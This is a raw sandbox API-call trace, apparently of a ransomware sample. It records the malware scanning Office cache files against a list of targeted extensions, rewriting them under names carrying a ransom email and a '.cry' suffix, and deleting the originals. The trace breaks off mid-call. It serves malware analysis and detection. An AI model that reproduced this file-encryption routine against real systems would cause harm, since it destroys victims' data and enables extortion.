[0046.618] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0046.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0046.618] lstrlenW (lpString=".1cd") returned 4 [0046.618] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0046.618] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 75 [0046.618] lstrlenW (lpString=".jpg") returned 4 [0046.618] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0046.619] lstrcmpiW (lpString1=".cab", lpString2=".cry") returned -1 [0046.619] lstrlenW (lpString="OfficeLR.cab") returned 12 [0046.619] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0046.619] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=14127746) returned 1 [0046.619] CloseHandle (hObject=0x1c0) returned 1 [0046.619] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab")) returned 0x2020 [0046.619] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0046.619] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0046.620] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0046.620] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0x0) returned 1 [0046.620] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.620] ReadFile (in: hFile=0x1c0, lpBuffer=0x3d90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3d90058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.664] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x47db80, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.664] ReadFile (in: hFile=0x1c0, lpBuffer=0x3dd0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3dd0058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0046.865] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x329fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0046.865] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xd39282, lpNewFilePointer=0x0, dwMoveMethod=0x329fc2c | out: lpNewFilePointer=0x0) returned 1 [0046.865] ReadFile (in: hFile=0x1c0, lpBuffer=0x3e10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x329fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e10058*, lpNumberOfBytesRead=0x329fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.109] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.110] WriteFile (in: hFile=0x1c0, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x329fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0047.124] SetEndOfFile (hFile=0x1c0) returned 1 [0047.124] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3fd40b0 [0047.129] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.129] WriteFile (in: hFile=0x1c0, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.129] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x47db80, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.129] WriteFile (in: hFile=0x1c0, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.130] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0xd39282, lpNewFilePointer=0x0, dwMoveMethod=0x329fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.130] WriteFile (in: hFile=0x1c0, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x329fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x329fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.132] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3fd40b0 | out: hHeap=0x600000) returned 1 [0047.132] CloseHandle (hObject=0x1c0) returned 1 [0047.132] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0047.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.132] lstrlenW (lpString=".doc") returned 4 [0047.132] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0047.132] lstrlenW (lpString=".docx") returned 5 [0047.132] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0047.132] lstrlenW (lpString=".pdf") returned 4 [0047.132] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0047.132] lstrlenW (lpString=".xls") returned 4 [0047.132] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0047.133] lstrlenW (lpString=".xlsx") returned 5 [0047.133] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0047.133] lstrlenW (lpString=".ppt") returned 4 [0047.133] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0047.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.133] lstrlenW (lpString=".zip") returned 4 [0047.133] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0047.133] lstrlenW (lpString=".rar") returned 4 [0047.133] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0047.133] lstrlenW (lpString=".bz2") returned 4 [0047.133] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0047.133] lstrlenW (lpString=".7z") returned 3 [0047.133] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0047.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.133] lstrlenW (lpString=".dbf") returned 4 [0047.133] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0047.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.133] lstrlenW (lpString=".1cd") returned 4 [0047.133] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0047.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.133] lstrlenW (lpString=".jpg") returned 4 [0047.133] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0047.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.133] lstrlenW (lpString=".doc") returned 4 [0047.133] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0047.133] lstrlenW (lpString=".docx") returned 5 [0047.133] lstrcmpiW (lpString1=".docx", lpString2="R.cab") returned -1 [0047.133] lstrlenW (lpString=".pdf") returned 4 [0047.133] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0047.133] lstrlenW (lpString=".xls") returned 4 [0047.133] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0047.133] lstrlenW (lpString=".xlsx") returned 5 [0047.133] lstrcmpiW (lpString1=".xlsx", lpString2="R.cab") returned -1 [0047.133] lstrlenW (lpString=".ppt") returned 4 [0047.133] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0047.133] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.133] lstrlenW (lpString=".zip") returned 4 [0047.133] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0047.133] lstrlenW (lpString=".rar") returned 4 [0047.133] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0047.134] lstrlenW (lpString=".bz2") returned 4 [0047.134] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0047.134] lstrlenW (lpString=".7z") returned 3 [0047.134] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0047.134] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.134] lstrlenW (lpString=".dbf") returned 4 [0047.134] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0047.134] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.134] lstrlenW (lpString=".1cd") returned 4 [0047.134] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0047.134] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 75 [0047.134] lstrlenW (lpString=".jpg") returned 4 [0047.134] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0047.134] lstrcmpiW (lpString1=".MST", lpString2=".cry") returned 1 [0047.134] lstrlenW (lpString="ShellUI.MST") returned 11 [0047.134] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0047.134] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=3584) returned 1 [0047.134] CloseHandle (hObject=0x1c0) returned 1 [0047.135] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst")) returned 0x2020 [0047.135] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.135] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0047.135] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.135] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.135] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0047.173] GetLastError () returned 0x0 [0047.173] ReadFile (in: hFile=0x1c0, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0xe00, lpOverlapped=0x0) returned 1 [0047.218] WriteFile (in: hFile=0x218, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xe10, lpOverlapped=0x0) returned 1 [0047.219] ReadFile (in: hFile=0x1c0, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.219] WriteFile (in: hFile=0x218, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.219] SetEndOfFile (hFile=0x218) returned 1 [0047.219] CloseHandle (hObject=0x218) returned 1 [0047.219] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.219] SetEndOfFile (hFile=0x1c0) returned 1 [0047.220] CloseHandle (hObject=0x1c0) returned 1 [0047.220] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0047.220] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst")) returned 1 [0047.220] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.220] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.220] lstrlenW (lpString=".doc") returned 4 [0047.220] lstrcmpiW (lpString1=".doc", lpString2=".MST") returned -1 [0047.220] lstrlenW (lpString=".docx") returned 5 [0047.220] lstrcmpiW (lpString1=".docx", lpString2="I.MST") returned -1 [0047.220] lstrlenW (lpString=".pdf") returned 4 [0047.220] lstrcmpiW (lpString1=".pdf", lpString2=".MST") returned 1 [0047.220] lstrlenW (lpString=".xls") returned 4 [0047.220] lstrcmpiW (lpString1=".xls", lpString2=".MST") returned 1 [0047.220] lstrlenW (lpString=".xlsx") returned 5 [0047.220] lstrcmpiW (lpString1=".xlsx", lpString2="I.MST") returned -1 [0047.220] lstrlenW (lpString=".ppt") returned 4 [0047.220] lstrcmpiW (lpString1=".ppt", lpString2=".MST") returned 1 [0047.220] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.220] lstrlenW (lpString=".zip") returned 4 [0047.220] lstrcmpiW (lpString1=".zip", lpString2=".MST") returned 1 [0047.220] lstrlenW (lpString=".rar") returned 4 [0047.220] lstrcmpiW (lpString1=".rar", lpString2=".MST") returned 1 [0047.220] lstrlenW (lpString=".bz2") returned 4 [0047.220] lstrcmpiW (lpString1=".bz2", lpString2=".MST") returned -1 [0047.220] lstrlenW (lpString=".7z") returned 3 [0047.220] lstrcmpiW (lpString1=".7z", lpString2="MST") returned -1 [0047.221] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.221] lstrlenW (lpString=".dbf") returned 4 [0047.221] lstrcmpiW (lpString1=".dbf", lpString2=".MST") returned -1 [0047.221] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.221] lstrlenW (lpString=".1cd") returned 4 [0047.221] lstrcmpiW (lpString1=".1cd", lpString2=".MST") returned -1 [0047.221] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.221] lstrlenW (lpString=".jpg") returned 4 [0047.221] lstrcmpiW (lpString1=".jpg", lpString2=".MST") returned -1 [0047.221] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.221] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.221] lstrlenW (lpString=".doc") returned 4 [0047.221] lstrcmpiW (lpString1=".doc", lpString2=".MST") returned -1 [0047.221] lstrlenW (lpString=".docx") returned 5 [0047.221] lstrcmpiW (lpString1=".docx", lpString2="I.MST") returned -1 [0047.221] lstrlenW (lpString=".pdf") returned 4 [0047.221] lstrcmpiW (lpString1=".pdf", lpString2=".MST") returned 1 [0047.221] lstrlenW (lpString=".xls") returned 4 [0047.221] lstrcmpiW (lpString1=".xls", lpString2=".MST") returned 1 [0047.221] lstrlenW (lpString=".xlsx") returned 5 [0047.221] lstrcmpiW (lpString1=".xlsx", lpString2="I.MST") returned -1 [0047.221] lstrlenW (lpString=".ppt") returned 4 [0047.221] lstrcmpiW (lpString1=".ppt", lpString2=".MST") returned 1 [0047.221] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.221] lstrlenW (lpString=".zip") returned 4 [0047.221] lstrcmpiW (lpString1=".zip", lpString2=".MST") returned 1 [0047.221] lstrlenW (lpString=".rar") returned 4 [0047.221] lstrcmpiW (lpString1=".rar", lpString2=".MST") returned 1 [0047.221] lstrlenW (lpString=".bz2") returned 4 [0047.221] lstrcmpiW (lpString1=".bz2", lpString2=".MST") returned -1 [0047.221] lstrlenW (lpString=".7z") returned 3 [0047.221] lstrcmpiW (lpString1=".7z", lpString2="MST") returned -1 [0047.221] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.221] lstrlenW (lpString=".dbf") returned 4 [0047.221] lstrcmpiW (lpString1=".dbf", lpString2=".MST") returned -1 [0047.221] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.221] lstrlenW (lpString=".1cd") returned 4 [0047.221] lstrcmpiW (lpString1=".1cd", lpString2=".MST") returned -1 [0047.221] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 74 [0047.221] lstrlenW (lpString=".jpg") returned 4 [0047.221] lstrcmpiW (lpString1=".jpg", lpString2=".MST") returned -1 [0047.222] lstrcmpiW (lpString1=".msi", lpString2=".cry") returned 1 [0047.222] lstrlenW (lpString="AccessMUISet.msi") returned 16 [0047.222] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0047.222] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=868864) returned 1 [0047.222] CloseHandle (hObject=0x1c0) returned 1 [0047.222] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi")) returned 0x2020 [0047.222] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0047.222] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0047.222] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.222] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.222] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0047.222] GetLastError () returned 0x0 [0047.222] ReadFile (in: hFile=0x1c0, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0xd4200, lpOverlapped=0x0) returned 1 [0047.398] WriteFile (in: hFile=0x218, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xd4210, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xd4210, lpOverlapped=0x0) returned 1 [0047.807] ReadFile (in: hFile=0x1c0, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x329fed4*=0x0, lpOverlapped=0x0) returned 1 [0047.807] WriteFile (in: hFile=0x218, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x329fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x329fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0047.807] SetEndOfFile (hFile=0x218) returned 1 [0047.807] CloseHandle (hObject=0x218) returned 1 [0047.808] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.808] SetEndOfFile (hFile=0x1c0) returned 1 [0047.816] CloseHandle (hObject=0x1c0) returned 1 [0047.816] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0047.816] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\accessmuiset.msi")) returned 1 [0047.816] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.816] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.816] lstrlenW (lpString=".doc") returned 4 [0047.816] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0047.816] lstrlenW (lpString=".docx") returned 5 [0047.816] lstrcmpiW (lpString1=".docx", lpString2="t.msi") returned -1 [0047.816] lstrlenW (lpString=".pdf") returned 4 [0047.816] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0047.816] lstrlenW (lpString=".xls") returned 4 [0047.817] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0047.817] lstrlenW (lpString=".xlsx") returned 5 [0047.817] lstrcmpiW (lpString1=".xlsx", lpString2="t.msi") returned -1 [0047.817] lstrlenW (lpString=".ppt") returned 4 [0047.817] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0047.817] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.817] lstrlenW (lpString=".zip") returned 4 [0047.817] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0047.817] lstrlenW (lpString=".rar") returned 4 [0047.817] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0047.817] lstrlenW (lpString=".bz2") returned 4 [0047.817] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0047.817] lstrlenW (lpString=".7z") returned 3 [0047.817] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0047.817] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 79 [0047.817] lstrlenW (lpString=".dbf") returned 4 [0047.817] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0047.817] lstrlenW 